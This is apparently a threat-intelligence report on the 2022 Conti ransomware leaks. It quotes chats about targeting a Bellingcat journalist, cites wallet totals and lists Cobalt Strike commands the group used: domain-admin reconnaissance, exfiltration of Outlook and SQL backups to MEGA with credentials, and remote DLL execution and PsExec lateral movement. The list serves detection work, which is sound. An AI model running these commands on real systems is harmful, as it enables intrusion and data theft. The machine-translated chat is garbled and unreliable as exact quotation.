Following the Conti group's announcement of support for the Russian government, an anonymous person identified on Twitter only as ContiLeaks declared his support for Ukraine in the ongoing war. On February 27, he began leaking internal information from the ransomware group. It consists of just over a year's worth of records of conversations between its operators, victims and other important individuals, as well as technical details about the attacks carried out and the infrastructure used, amounts received and even the addresses of cryptocurrency wallets, some of which still contain money from ransoms received.
Chat history
One of the richest materials for threat intelligence purposes is the recordings of conversations between Conti members. Its content is extensive and is still being analyzed, but it has already brought important revelations, such as a possible association between the group and the FSB (the Russian intelligence agency that replaced the KGB).
In April last year, two members discussed a raid targeting a journalist from the Bellingcat group, specifically targeting files on Alexei Navalny, a former political opponent of Vladimir Putin who was poisoned in August 2020.
"Bro is such a question - we work on politics?)"
"in what respect?"
"<Johnyboy77> If the info is some kind of important supposedly
[21:04:21] <Johnyboy77> or just score?
[21:10:55] <Mango> Hi Bro
[21:11:06] <Mango> Come on)
[21:11:12] <Johnyboy77> Property
[21:11:13] <Mango> In general, we work for loot :)
[21:11:20] <Mango> And fuck from whom to demand it
[21:11:22] <Johnyboy77> I merged the correspondence of people who are working
against the Russian Federation
[21:11:25] <Johnyboy77> in the information field
[21:11:31] <Johnyboy77> But I can not decipher
[21:11:34] <Johnyboy77> Correspondence of the signal
[21:11:52] <Johnyboy77> shorter journalists
[21:11:54] <Mango> I will ask)
[21:11:55] <Johnyboy77> which are pussy against the Russian Federation
[21:12:04] <Johnyboy77> current file brooms fucking can not decipher
[21:12:13] <Johnyboy77> piece of concrete happened "
"We need this?"
"I don't know how to decorate a signal"
"Or we are current for loot and without political fuss"
"This is E2E"
"Soron I can not do anything here ("
"I even want to help \ Note to help"
"So, in general, we are interested in such data?"
"Ie we are patriots or how?)))"
"We are of course patriots)"
"I understood. If they decipher there - the Mayakna"
"And I wrote there other day to you about Aucion, but I understand you while
busy and did not delve)"
[21:21:02] <Johnyboy77> in short So say
[21:21:08] <Johnyboy77> And all of his passwords are
[21:21:17] <Johnyboy77> And she is still Valid
[21:30:56] <Mango> Well Corresponders at least Zaskrinh them
[21:31:05] <Mango> Need spectects bro what to say
[21:31:07] <Johnyboy77> Pink out files
[21:31:12] <Johnyboy77> navalni FSB
Some time later, there is a new charge and reference to a "boss":
"Bro about Navalny do not forget, I looked at the chief - he is waiting for details"
The story under discussion is likely to be Hunting the Hunters: How We Identified Navalny's FSB Stalkers, which details how the Bellingcat team identified the FSB officers involved in monitoring and following Navalny at the time of his poisoning.
The conversations also revealed the addresses of bitcoin wallets used by the group. An investigation by the vx-underground group showed that between April 21, 2017 and February 28, 2022, Conti's main wallet accumulated around 2.7 billion dollars:
It seems that the ransomware group has not yet been able to identify who is leaking their data on Twitter. Chat logs from March 1, 2022 show the internal confusion:
"ts": "2022-03-01T14:09:27.345914", "from": "qwerty@q3mcco35auwcstmt.onion", "to": "cybergangster@q3mcco35auwcstmt.onion", "body": "Listen, Azim and Smelian wrote me today, they're worried they're falling over17:09that they've been messing with us17:09what should I tell them?" "ts": "2022-03-01T16:12:42.619523", "from": "wind@q3mcco35auwcstmt.onion", "to": "mango@q3mcco35auwcstmt.onion", "body": "who leaked, did you find out?{backslash}do you think we'll rebel?"
It is interesting to note that the recipient of the second message, Mango, is the same person involved in the conversations about Alexei Navalny in April 2021. There are several mentions of the Cobalt Strike tool in the leaks. Commands and legitimate binaries (LOLbins) associated with it are dealt with in the following section.
Cobalt Strike and LOLbins
Among the leaks released so far, Conti Rocket Chat Leaks.
7z (7B49130E26505A6AC3786591F548D492DD6D83CE8986477AD803FD04615209F8) contains a series of exploits of legitimate Windows executables during Conti group invasions. Pay special attention to commands beginning with "shell": these redirect input to the infected machine's command prompt, which makes them much easier to detect.
We will not attach the full content of this leak to this document, as it concentrates internal network data from the group's victims. For those interested in obtaining all occurrences of Cobalt Strike use in the file in question, we recommend the following command, adapted from @c3rb3ru5d3d53c:
find . -type f -name ".json" | grep -P '\d+-\d+-\d+..json' | while read i; do
cat $i | jq -r '.messages[].msg' | grep 'beacon>'; done
Here are some relevant commands for detecting Conti activity.
Commands redirected from CS to the command prompt |
reg query HKCU\Environment |
net localgroup administrators |
net group "Domain admins" /dom |
net group "Enterprise admins" /dom |
start /b MEGAcmdServer.exe |
MEGAclient.exe update -auto=off |
MEGAclient.exe login jyszkivtedxvrqbbit@upived.online teguiQWERmjsd |
MEGAclient.exe whoami |
MEGAclient.exe put -q -ignore-quota-warn "C:\Users*****\Documents\Outlook Files\ol.7z" |
MEGAclient.exe put -q -ignore-quota-warn F:\SQLBackup*.bak |
wmic /node:10...* process call create "rundll32 C:\ProgramData\x64.dll entryPoint" |
PsExec \* -d -s -h gpupdate /force -accepteula -y -u .local* -p * |
We have suppressed sensitive target information in the examples above. It is interesting to note that good detection practices would alert you to several of the commands listed, such as the use of -accepteula to run SysInternals tools. You can also see that Conti used MEGA (formerly megaupload) for some of his activities. We don't know if this behavior is still present in the group's current incursions.
Source code and builder
The hardest blow to the criminal group came on March 1st, when the source code of the ransomware was leaked, along with its builder (the executable used to generate the final version that will be sent to the victims).
This content is protected by a password that the user ContiLeaks provided to a small group of researchers. Shortly afterwards, a second version was released, this time without a password, which omitted the ransomware code and its main functions. Due to the choice of a deprecated encryption protocol, it was possible to use this second version to extract the protected content of the complete leak. Within this content, the builder is protected by a second, as yet undiscovered password.
It's likely that new ransomware groups and low-skill malicious actors will take advantage of Conti's source code to generate their own versions of this malware. For this reason, we won't share where to get the full leak or how to extract its contents without the password. Minimally competent researchers will be able to obtain this information easily.
Conclusion
This is still a developing situation. Analyzing so much material, whether in the form of code or chat logs, will take time. It seems that the leaker has not yet been discovered by the group and will continue to publish information from Conti. We will keep everyone updated on our research involving these materials, sharing as much information as possible with the security community.
For those who want to work directly with the leaks, you can download the compressed files at hxxps://share[.]vx-underground[.]org/Conti/. Translations of materials into English are available at the following GitHub addresses:
https://github.com/west-wind/conti-leaks
https://github.com/TheParmak/conti-leaks-englished
Finally, the bibliographical references in this report contain additional information. We recommend that you read them.
Bibliographical references
https://twitter.com/ContiLeaks/ https://github.com/west-wind/conti-leaks https://github.com/TheParmak/conti-leaks-englished https://blog.malwarebytes.com/threat-intelligence/2022/03/the-conti-ransomware-leaks/ https://www.rapid7.com/blog/post/2022/03/01/conti-ransomware-group-internal-chats-leaked-over-russia-ukraine-conflict/ https://krebsonsecurity.com/2022/03/conti-ransomware-group-diaries-part-i-evasion/ https://arstechnica.com/information-technology/2022/03/conti-cybergang-gloated-when-leaking-victims-data-now-the-tables-are-turned/ https://www.theregister.com/2022/02/28/conti_ransomware_gang_chats_leaked